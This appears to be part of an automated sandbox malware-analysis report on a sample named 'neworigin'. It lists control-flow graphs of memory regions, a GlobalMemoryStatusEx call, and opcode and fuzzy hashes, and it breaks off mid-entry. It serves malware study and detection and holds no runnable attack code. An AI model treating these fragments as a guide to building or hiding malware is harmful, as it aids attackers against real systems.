                                                                                                                                control_flow_graph 2991 6dc7e78-6dc7e96 2992 6dc7e98-6dc7e9b 2991->2992 2993 6dc7e9d-6dc7eab 2992->2993 2994 6dc7eb2-6dc7eb5 2992->2994 3000 6dc7ead 2993->3000 3001 6dc7f1e-6dc7f34 2993->3001 2995 6dc7eb7-6dc7ec1 2994->2995 2996 6dc7ec2-6dc7ec5 2994->2996 2998 6dc7ee8-6dc7eeb 2996->2998 2999 6dc7ec7-6dc7ee3 2996->2999 3002 6dc7f0c-6dc7f0e 2998->3002 3003 6dc7eed-6dc7f07 2998->3003 2999->2998 3000->2994 3009 6dc814f-6dc8159 3001->3009 3010 6dc7f3a-6dc7f43 3001->3010 3004 6dc7f15-6dc7f18 3002->3004 3005 6dc7f10 3002->3005 3003->3002 3004->2992 3004->3001 3005->3004 3013 6dc7f49-6dc7f66 3010->3013 3014 6dc815a-6dc818f 3010->3014 3023 6dc813c-6dc8149 3013->3023 3024 6dc7f6c-6dc7f94 3013->3024 3017 6dc8191-6dc8194 3014->3017 3018 6dc83c9-6dc83cc 3017->3018 3019 6dc819a-6dc81a9 3017->3019 3021 6dc83ce-6dc83ea 3018->3021 3022 6dc83ef-6dc83f2 3018->3022 3030 6dc81c8-6dc820c 3019->3030 3031 6dc81ab-6dc81c6 3019->3031 3021->3022 3026 6dc849d-6dc849f 3022->3026 3027 6dc83f8-6dc8404 3022->3027 3023->3009 3023->3010 3024->3023 3042 6dc7f9a-6dc7fa3 3024->3042 3032 6dc84a6-6dc84a9 3026->3032 3033 6dc84a1 3026->3033 3035 6dc840f-6dc8411 3027->3035 3047 6dc839d-6dc83b3 3030->3047 3048 6dc8212-6dc8223 3030->3048 3031->3030 3032->3017 3034 6dc84af-6dc84b8 3032->3034 3033->3032 3039 6dc8429-6dc842d 3035->3039 3040 6dc8413-6dc8419 3035->3040 3045 6dc842f-6dc8439 3039->3045 3046 6dc843b 3039->3046 3043 6dc841d-6dc841f 3040->3043 3044 6dc841b 3040->3044 3042->3014 3050 6dc7fa9-6dc7fc5 3042->3050 3043->3039 3044->3039 3049 6dc8440-6dc8442 3045->3049 3046->3049 3047->3018 3058 6dc8388-6dc8397 3048->3058 3059 6dc8229-6dc8246 3048->3059 3053 6dc8444-6dc8447 3049->3053 3054 6dc8453-6dc848c 3049->3054 3061 6dc812a-6dc8136 3050->3061 3062 6dc7fcb-6dc7ff5 3050->3062 3053->3034 3054->3019 3074 6dc8492-6dc849c 3054->3074 3058->3047 3058->3048 3059->3058 3068 6dc824c-6dc8342 call 6dc6698 3059->3068 3061->3023 3061->3042 3075 6dc7ffb-6dc8023 3062->3075 3076 6dc8120-6dc8125 3062->3076 3124 6dc8344-6dc834e 3068->3124 3125 6dc8350 3068->3125 3075->3076 3082 6dc8029-6dc8057 3075->3082 3076->3061 3082->3076 3088 6dc805d-6dc8066 3082->3088 3088->3076 3090 6dc806c-6dc809e 3088->3090 3097 6dc80a9-6dc80c5 3090->3097 3098 6dc80a0-6dc80a4 3090->3098 3097->3061 3100 6dc80c7-6dc811e call 6dc6698 3097->3100 3098->3076 3099 6dc80a6 3098->3099 3099->3097 3100->3061 3126 6dc8355-6dc8357 3124->3126 3125->3126 3126->3058 3127 6dc8359-6dc835e 3126->3127 3128 6dc836c 3127->3128 3129 6dc8360-6dc836a 3127->3129 3130 6dc8371-6dc8373 3128->3130 3129->3130 3130->3058 3131 6dc8375-6dc8381 3130->3131 3131->3058
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2e8ba1f23d1e854979b19b98659eafa8f6294b78885067b02adc5de3376a908c
                                                                                                                                • Instruction ID: 94cdc028edde49d85c564581711c5c87c280ce700d2df6f45d02f07567c2c492
                                                                                                                                • Opcode Fuzzy Hash: 2e8ba1f23d1e854979b19b98659eafa8f6294b78885067b02adc5de3376a908c
                                                                                                                                • Instruction Fuzzy Hash: 33027C31B0021A9FDB55DF68D890AAEB7F6FF84320F148569D815EB350DB35EC868B90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 510 16be680-16bf02e 512 16bf036-16bf064 GlobalMemoryStatusEx 510->512 513 16bf06d-16bf095 512->513 514 16bf066-16bf06c 512->514 514->513
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 016BF057
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1683014339.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_16b0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                • Opcode ID: 6838c1811dce917065e69ddb980eabf5c1cc9753bb459b71d5eeebdf35dcbd4c
                                                                                                                                • Instruction ID: 483ca339cd95eea56e2c0fa6a47ed405f2b187b8536ab89ffc0b3cc2f5a0e458
                                                                                                                                • Opcode Fuzzy Hash: 6838c1811dce917065e69ddb980eabf5c1cc9753bb459b71d5eeebdf35dcbd4c
                                                                                                                                • Instruction Fuzzy Hash: 051117B1C006599BDB10CF9AD8447DEFBF4AF48210F10816AE918B7350D778A940CFE5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 517 16befe8-16bf064 GlobalMemoryStatusEx 519 16bf06d-16bf095 517->519 520 16bf066-16bf06c 517->520 520->519
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 016BF057
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1683014339.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_16b0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                • Opcode ID: 97960cadd9479c3543474471aee20fe6ad598fa9abc0691c01608071df0ad3e0
                                                                                                                                • Instruction ID: cd0ad81769ed265171607211245c6fa7c9325c6860105ac327ea459e0c061ef3
                                                                                                                                • Opcode Fuzzy Hash: 97960cadd9479c3543474471aee20fe6ad598fa9abc0691c01608071df0ad3e0
                                                                                                                                • Instruction Fuzzy Hash: 8D1133B2C006599FDB14CFAAD8847DEFBF4AF48310F11816AE418A7240C378A940CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1320 6dcd060-6dcd07b 1321 6dcd07d-6dcd080 1320->1321 1322 6dcd0c9-6dcd0cc 1321->1322 1323 6dcd082-6dcd0c4 1321->1323 1324 6dcd0ce-6dcd110 1322->1324 1325 6dcd115-6dcd118 1322->1325 1323->1322 1324->1325 1327 6dcd11a-6dcd136 1325->1327 1328 6dcd13b-6dcd13e 1325->1328 1327->1328 1330 6dcd14d-6dcd150 1328->1330 1331 6dcd140-6dcd142 1328->1331 1335 6dcd199-6dcd19c 1330->1335 1336 6dcd152-6dcd161 1330->1336 1333 6dcd148 1331->1333 1334 6dcd549 1331->1334 1333->1330 1339 6dcd54c-6dcd558 1334->1339 1342 6dcd19e-6dcd1a0 1335->1342 1343 6dcd1ab-6dcd1ae 1335->1343 1340 6dcd170-6dcd17c 1336->1340 1341 6dcd163-6dcd168 1336->1341 1349 6dcd1fc-6dcd20b 1339->1349 1350 6dcd55e-6dcd84b 1339->1350 1351 6dcda7d-6dcdab6 1340->1351 1352 6dcd182-6dcd194 1340->1352 1341->1340 1344 6dcd1a6 1342->1344 1345 6dcd407-6dcd410 1342->1345 1347 6dcd1f7-6dcd1fa 1343->1347 1348 6dcd1b0-6dcd1f2 1343->1348 1344->1343 1355 6dcd41f-6dcd42b 1345->1355 1356 6dcd412-6dcd417 1345->1356 1347->1349 1357 6dcd243-6dcd246 1347->1357 1348->1347 1358 6dcd20d-6dcd212 1349->1358 1359 6dcd21a-6dcd226 1349->1359 1532 6dcd851-6dcd857 1350->1532 1533 6dcda72-6dcda7c 1350->1533 1372 6dcdab8-6dcdabb 1351->1372 1352->1335 1360 6dcd53c-6dcd541 1355->1360 1361 6dcd431-6dcd445 1355->1361 1356->1355 1365 6dcd28f-6dcd292 1357->1365 1366 6dcd248-6dcd28a 1357->1366 1358->1359 1359->1351 1363 6dcd22c-6dcd23e 1359->1363 1360->1334 1361->1334 1385 6dcd44b-6dcd45d 1361->1385 1363->1357 1370 6dcd2db-6dcd2de 1365->1370 1371 6dcd294-6dcd2d6 1365->1371 1366->1365 1383 6dcd2e8-6dcd2eb 1370->1383 1384 6dcd2e0-6dcd2e5 1370->1384 1371->1370 1377 6dcdabd-6dcdad9 1372->1377 1378 6dcdade-6dcdae1 1372->1378 1377->1378 1387 6dcdaf0-6dcdaf3 1378->1387 1388 6dcdae3 call 6dcdbd5 1378->1388 1390 6dcd2ed-6dcd32f 1383->1390 1391 6dcd334-6dcd337 1383->1391 1384->1383 1409 6dcd45f-6dcd465 1385->1409 1410 6dcd481-6dcd483 1385->1410 1396 6dcdaf5-6dcdb21 1387->1396 1397 6dcdb26-6dcdb28 1387->1397 1401 6dcdae9-6dcdaeb 1388->1401 1390->1391 1391->1339 1395 6dcd33d-6dcd340 1391->1395 1405 6dcd389-6dcd38c 1395->1405 1406 6dcd342-6dcd384 1395->1406 1396->1397 1402 6dcdb2f-6dcdb32 1397->1402 1403 6dcdb2a 1397->1403 1401->1387 1402->1372 1408 6dcdb34-6dcdb43 1402->1408 1403->1402 1412 6dcd38e-6dcd3d0 1405->1412 1413 6dcd3d5-6dcd3d8 1405->1413 1406->1405 1436 6dcdbaa-6dcdbbf 1408->1436 1437 6dcdb45-6dcdba8 call 6dc6698 1408->1437 1417 6dcd469-6dcd475 1409->1417 1418 6dcd467 1409->1418 1416 6dcd48d-6dcd499 1410->1416 1412->1413 1421 6dcd3da-6dcd3f0 1413->1421 1422 6dcd3f5-6dcd3f7 1413->1422 1444 6dcd49b-6dcd4a5 1416->1444 1445 6dcd4a7 1416->1445 1424 6dcd477-6dcd47f 1417->1424 1418->1424 1421->1422 1429 6dcd3fe-6dcd401 1422->1429 1430 6dcd3f9 1422->1430 1424->1416 1429->1321 1429->1345 1430->1429 1437->1436 1449 6dcd4ac-6dcd4ae 1444->1449 1445->1449 1449->1334 1454 6dcd4b4-6dcd4d0 call 6dc6698 1449->1454 1469 6dcd4df-6dcd4eb 1454->1469 1470 6dcd4d2-6dcd4d7 1454->1470 1469->1360 1472 6dcd4ed-6dcd53a 1469->1472 1470->1469 1472->1334 1534 6dcd859-6dcd85e 1532->1534 1535 6dcd866-6dcd86f 1532->1535 1534->1535 1535->1351 1536 6dcd875-6dcd888 1535->1536 1538 6dcd88e-6dcd894 1536->1538 1539 6dcda62-6dcda6c 1536->1539 1540 6dcd896-6dcd89b 1538->1540 1541 6dcd8a3-6dcd8ac 1538->1541 1539->1532 1539->1533 1540->1541 1541->1351 1542 6dcd8b2-6dcd8d3 1541->1542 1545 6dcd8d5-6dcd8da 1542->1545 1546 6dcd8e2-6dcd8eb 1542->1546 1545->1546 1546->1351 1547 6dcd8f1-6dcd90e 1546->1547 1547->1539 1550 6dcd914-6dcd91a 1547->1550 1550->1351 1551 6dcd920-6dcd939 1550->1551 1553 6dcd93f-6dcd966 1551->1553 1554 6dcda55-6dcda5c 1551->1554 1553->1351 1557 6dcd96c-6dcd976 1553->1557 1554->1539 1554->1550 1557->1351 1558 6dcd97c-6dcd993 1557->1558 1560 6dcd995-6dcd9a0 1558->1560 1561 6dcd9a2-6dcd9bd 1558->1561 1560->1561 1561->1554 1566 6dcd9c3-6dcd9dc call 6dc6698 1561->1566 1570 6dcd9de-6dcd9e3 1566->1570 1571 6dcd9eb-6dcd9f4 1566->1571 1570->1571 1571->1351 1572 6dcd9fa-6dcda4e 1571->1572 1572->1554
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 43821acd65d9e2fcee87a3029d934786eefda1a24bcd106b6bc0a7e661c785f0
                                                                                                                                • Instruction ID: aac59c3592aac93c0b3d228fd7c1fcd08efddec24f83531d88ce0048435a7127
                                                                                                                                • Opcode Fuzzy Hash: 43821acd65d9e2fcee87a3029d934786eefda1a24bcd106b6bc0a7e661c785f0
                                                                                                                                • Instruction Fuzzy Hash: 42624D30A0030ADFDB55EF68D990A9EB7F2FF85724B208568D0059B354DB79ED46CB80

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2823 6dcb760-6dcb782 2824 6dcb784-6dcb787 2823->2824 2825 6dcb7ae-6dcb7b1 2824->2825 2826 6dcb789-6dcb78d 2824->2826 2829 6dcb7c8-6dcb7cb 2825->2829 2830 6dcb7b3-6dcb7b7 2825->2830 2827 6dcbb05-6dcbb3e 2826->2827 2828 6dcb793-6dcb7a3 2826->2828 2842 6dcbb40-6dcbb43 2827->2842 2840 6dcb7a9 2828->2840 2841 6dcb936-6dcb93a 2828->2841 2832 6dcb7cd-6dcb7cf 2829->2832 2833 6dcb7d2-6dcb7d5 2829->2833 2830->2827 2831 6dcb7bd-6dcb7c3 2830->2831 2831->2829 2832->2833 2836 6dcb7d7-6dcb7dd 2833->2836 2837 6dcb7e2-6dcb7e5 2833->2837 2836->2837 2838 6dcb7f9-6dcb7fc 2837->2838 2839 6dcb7e7-6dcb7eb 2837->2839 2846 6dcbad5-6dcbad6 2838->2846 2847 6dcb802-6dcb805 2838->2847 2839->2827 2845 6dcb7f1-6dcb7f4 2839->2845 2840->2825 2841->2827 2848 6dcb940-6dcb950 2841->2848 2843 6dcbb45-6dcbb61 2842->2843 2844 6dcbb66-6dcbb69 2842->2844 2843->2844 2851 6dcbb6f-6dcbb97 2844->2851 2852 6dcbdd5-6dcbdd7 2844->2852 2845->2838 2853 6dcbadb-6dcbade 2846->2853 2849 6dcb869-6dcb86c 2847->2849 2850 6dcb807-6dcb864 call 6dc6698 2847->2850 2862 6dcba9a-6dcba9e 2848->2862 2863 6dcb956 2848->2863 2856 6dcb87c-6dcb87f 2849->2856 2857 6dcb86e-6dcb877 2849->2857 2850->2849 2905 6dcbb99-6dcbb9c 2851->2905 2906 6dcbba1-6dcbbe5 2851->2906 2858 6dcbdde-6dcbde1 2852->2858 2859 6dcbdd9 2852->2859 2860 6dcbae8-6dcbaea 2853->2860 2861 6dcbae0-6dcbae5 2853->2861 2864 6dcb8a1-6dcb8a4 2856->2864 2865 6dcb881-6dcb89c 2856->2865 2857->2856 2858->2842 2866 6dcbde7-6dcbdf0 2858->2866 2859->2858 2869 6dcbaec 2860->2869 2870 6dcbaf1-6dcbaf4 2860->2870 2861->2860 2862->2827 2875 6dcbaa0-6dcbab0 2862->2875 2871 6dcb95b-6dcb95e 2863->2871 2876 6dcb8ae-6dcb8b1 2864->2876 2877 6dcb8a6-6dcb8a9 2864->2877 2865->2864 2869->2870 2870->2824 2874 6dcbafa-6dcbb04 2870->2874 2878 6dcb978-6dcb97b 2871->2878 2879 6dcb960-6dcb966 2871->2879 2875->2846 2891 6dcbab2 2875->2891 2883 6dcb8c1-6dcb8c4 2876->2883 2884 6dcb8b3-6dcb8bc 2876->2884 2877->2876 2888 6dcb97d-6dcb981 2878->2888 2889 6dcb992-6dcb995 2878->2889 2879->2827 2887 6dcb96c-6dcb973 2879->2887 2885 6dcb8c6-6dcb8db 2883->2885 2886 6dcb903-6dcb906 2883->2886 2884->2883 2885->2827 2910 6dcb8e1-6dcb8fe 2885->2910 2892 6dcb908-6dcb911 2886->2892 2893 6dcb916-6dcb919 2886->2893 2887->2878 2888->2827 2894 6dcb987-6dcb98d 2888->2894 2889->2846 2895 6dcb99b-6dcb99e 2889->2895 2899 6dcbab7-6dcbaba 2891->2899 2892->2893 2901 6dcbabc-6dcbac5 2893->2901 2902 6dcb91f-6dcb922 2893->2902 2894->2889 2903 6dcb9b0-6dcb9b3 2895->2903 2904 6dcb9a0 2895->2904 2899->2901 2907 6dcbad0-6dcbad3 2899->2907 2908 6dcba0a-6dcba13 2901->2908 2909 6dcbacb 2901->2909 2911 6dcb924-6dcb92a 2902->2911 2912 6dcb931-6dcb934 2902->2912 2914 6dcb9c5-6dcb9c8 2903->2914 2915 6dcb9b5-6dcb9c0 2903->2915 2921 6dcb9a8-6dcb9ab 2904->2921 2905->2866 2942 6dcbdca-6dcbdd4 2906->2942 2943 6dcbbeb-6dcbbf4 2906->2943 2907->2846 2907->2853 2908->2827 2919 6dcba19-6dcba20 2908->2919 2909->2907 2910->2886 2911->2879 2920 6dcb92c 2911->2920 2912->2841 2912->2871 2917 6dcb9d9-6dcb9dc 2914->2917 2918 6dcb9ca-6dcb9ce 2914->2918 2915->2914 2924 6dcb9ec-6dcb9ef 2917->2924 2925 6dcb9de-6dcb9e7 2917->2925 2918->2884 2923 6dcb9d4 2918->2923 2927 6dcba25-6dcba28 2919->2927 2920->2912 2921->2903 2923->2917 2924->2911 2930 6dcb9f5-6dcb9f8 2924->2930 2925->2924 2927->2846 2931 6dcba2e-6dcba31 2927->2931 2933 6dcb9fa-6dcba00 2930->2933 2934 6dcba05-6dcba08 2930->2934 2935 6dcba54-6dcba57 2931->2935 2936 6dcba33-6dcba4f 2931->2936 2933->2934 2934->2908 2934->2927 2938 6dcba59-6dcba6e 2935->2938 2939 6dcba95-6dcba98 2935->2939 2936->2935 2938->2827 2948 6dcba74-6dcba90 2938->2948 2939->2862 2939->2899 2944 6dcbbfa-6dcbc66 call 6dc6698 2943->2944 2945 6dcbdc0-6dcbdc5 2943->2945 2957 6dcbc6c-6dcbc71 2944->2957 2958 6dcbd60-6dcbd75 2944->2958 2945->2942 2948->2939 2959 6dcbc8d 2957->2959 2960 6dcbc73-6dcbc79 2957->2960 2958->2945 2964 6dcbc8f-6dcbc95 2959->2964 2962 6dcbc7f-6dcbc81 2960->2962 2963 6dcbc7b-6dcbc7d 2960->2963 2965 6dcbc8b 2962->2965 2963->2965 2966 6dcbcaa-6dcbcb7 2964->2966 2967 6dcbc97-6dcbc9d 2964->2967 2965->2964 2974 6dcbccf-6dcbcdc 2966->2974 2975 6dcbcb9-6dcbcbf 2966->2975 2968 6dcbd4b-6dcbd5a 2967->2968 2969 6dcbca3 2967->2969 2968->2957 2968->2958 2969->2966 2970 6dcbcde-6dcbceb 2969->2970 2971 6dcbd12-6dcbd1f 2969->2971 2983 6dcbced-6dcbcf3 2970->2983 2984 6dcbd03-6dcbd10 2970->2984 2980 6dcbd37-6dcbd44 2971->2980 2981 6dcbd21-6dcbd27 2971->2981 2974->2968 2978 6dcbcc1 2975->2978 2979 6dcbcc3-6dcbcc5 2975->2979 2978->2974 2979->2974 2980->2968 2985 6dcbd29 2981->2985 2986 6dcbd2b-6dcbd2d 2981->2986 2987 6dcbcf5 2983->2987 2988 6dcbcf7-6dcbcf9 2983->2988 2984->2968 2985->2980 2986->2980 2987->2984 2988->2984
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 055b8301237a2642b986bf6af956e230b161f518f2422e2507125dc5af574578
                                                                                                                                • Instruction ID: 4abad56a71ce3a58d9ca847bd286cfa506cebac0c7b58e0b84e2c00079111819
                                                                                                                                • Opcode Fuzzy Hash: 055b8301237a2642b986bf6af956e230b161f518f2422e2507125dc5af574578
                                                                                                                                • Instruction Fuzzy Hash: 32025930E0020E9FDFA4CF68D581AADB7B2FB85720F20856AD456EB250DB75DD41CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 25e55a9ac0c9402b1dc900811c23113e6232babf91023b0613d56b1678ae733a
                                                                                                                                • Instruction ID: 7fa06326e811cf1ab147ddb3e6a3e173ff57df5c17cacb51a245ce96b32226b8
                                                                                                                                • Opcode Fuzzy Hash: 25e55a9ac0c9402b1dc900811c23113e6232babf91023b0613d56b1678ae733a
                                                                                                                                • Instruction Fuzzy Hash: A9916F30B1020A9FDB95DF68D8607AEB3B6FF84710F108569D809AB354EF35AC458B90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1c5d0d5cd47339d6b4b84eda06100ddc48b21a2b6f3290c782d44e179f99e367
                                                                                                                                • Instruction ID: 6c74bd08b6ced5ac6b99ef783d9a11081868c5565d4f463a42cca609cb934a82
                                                                                                                                • Opcode Fuzzy Hash: 1c5d0d5cd47339d6b4b84eda06100ddc48b21a2b6f3290c782d44e179f99e367
                                                                                                                                • Instruction Fuzzy Hash: B261D371F001124BDF55AB6EC98456EBAEBEFD4620B294079D80ADB360DE75EC0287D1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 33d6b5bcf6eb55df33c3ca5d14d4f6a7f2796ddea716b1032727fee15f244782
                                                                                                                                • Instruction ID: 4e170ab4a0c56ed93dcb998552995320da109c7bd336881855db3618e37553be
                                                                                                                                • Opcode Fuzzy Hash: 33d6b5bcf6eb55df33c3ca5d14d4f6a7f2796ddea716b1032727fee15f244782
                                                                                                                                • Instruction Fuzzy Hash: EB814C30B0060A9BDF54DFB9D4646AEB7F6EF88310F248529D40AEB354DA75DC428B91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e800bde39579d55731c591e9f1284c6fd4afa471bc39049fea4d076baf5279bc
                                                                                                                                • Instruction ID: 9bead7e21f77d12bae69c2b08ccab20b192e2b3847195c28d4d4968bf0037767
                                                                                                                                • Opcode Fuzzy Hash: e800bde39579d55731c591e9f1284c6fd4afa471bc39049fea4d076baf5279bc
                                                                                                                                • Instruction Fuzzy Hash: 95914F34E0061A8FDF60DF68C850BDDB7B1FF89310F208599D449AB295DB71AA85CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7025f21d8c36c1b8d43fc51ddcd57d8c3d0fd6afd7ad4ee16325534c137ddb30
                                                                                                                                • Instruction ID: a1032ef651412e6b9ef30408e6d4fd14f901e0ffd1666794ce4ce4bee9302a3b
                                                                                                                                • Opcode Fuzzy Hash: 7025f21d8c36c1b8d43fc51ddcd57d8c3d0fd6afd7ad4ee16325534c137ddb30
                                                                                                                                • Instruction Fuzzy Hash: AA715D31E0071ACFDF64DFA9D8906AEB7B2FF85314F10862AD815AB354DB75D8468B80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d33b224129cce1ed27f22a5f14c49e6dc742a483012305b6ac76e8f4b0c30a12
                                                                                                                                • Instruction ID: 72e8aaf34b5fdf8280181d62cfd29b38cdfade6ce90761f35a8bc2a257f7f7b0
                                                                                                                                • Opcode Fuzzy Hash: d33b224129cce1ed27f22a5f14c49e6dc742a483012305b6ac76e8f4b0c30a12
                                                                                                                                • Instruction Fuzzy Hash: 12913F34E1061A8BDF60DF68C850BDDB7B1FF89310F208599D549BB284DB71AA85CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a93bfa609c734fe03b92de812c1092d0983efff37f56129e27861efb27fdc68b
                                                                                                                                • Instruction ID: 9e8b0f002e757e0373dc85453ae347476f147441d866c364b428f7c569a63729
                                                                                                                                • Opcode Fuzzy Hash: a93bfa609c734fe03b92de812c1092d0983efff37f56129e27861efb27fdc68b
                                                                                                                                • Instruction Fuzzy Hash: DB712C70A0020A9FDB54DFA9D990A9EBBFAFF84310F248529E415EB354DB34ED46CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ee43c80e0d3a864cb97cac8e19d756d11504c3f839b3d9c1430427637744802
                                                                                                                                • Instruction ID: 3634e1d7ef126b0ca15a6831fcfd2eedb6444558c1b03c7ca4417011bdbefe26
                                                                                                                                • Opcode Fuzzy Hash: 5ee43c80e0d3a864cb97cac8e19d756d11504c3f839b3d9c1430427637744802
                                                                                                                                • Instruction Fuzzy Hash: 32713A70A0020A9FDB54DFA9C980A9EBBFAFF84310F248529D415EB354DB34ED46CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f0480e777e09044027a51f6bf07de43ba4c1d824f98286dde693052e0087b4e9
                                                                                                                                • Instruction ID: 85df017b571abe64e098fb62ffc47fc093f5f7dc8e840c052f3b27901c895a30
                                                                                                                                • Opcode Fuzzy Hash: f0480e777e09044027a51f6bf07de43ba4c1d824f98286dde693052e0087b4e9
                                                                                                                                • Instruction Fuzzy Hash: DA618330F002199FEF549BA8D514BAEBAF6FF88750F20842DD50AEB390DB759C458B94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
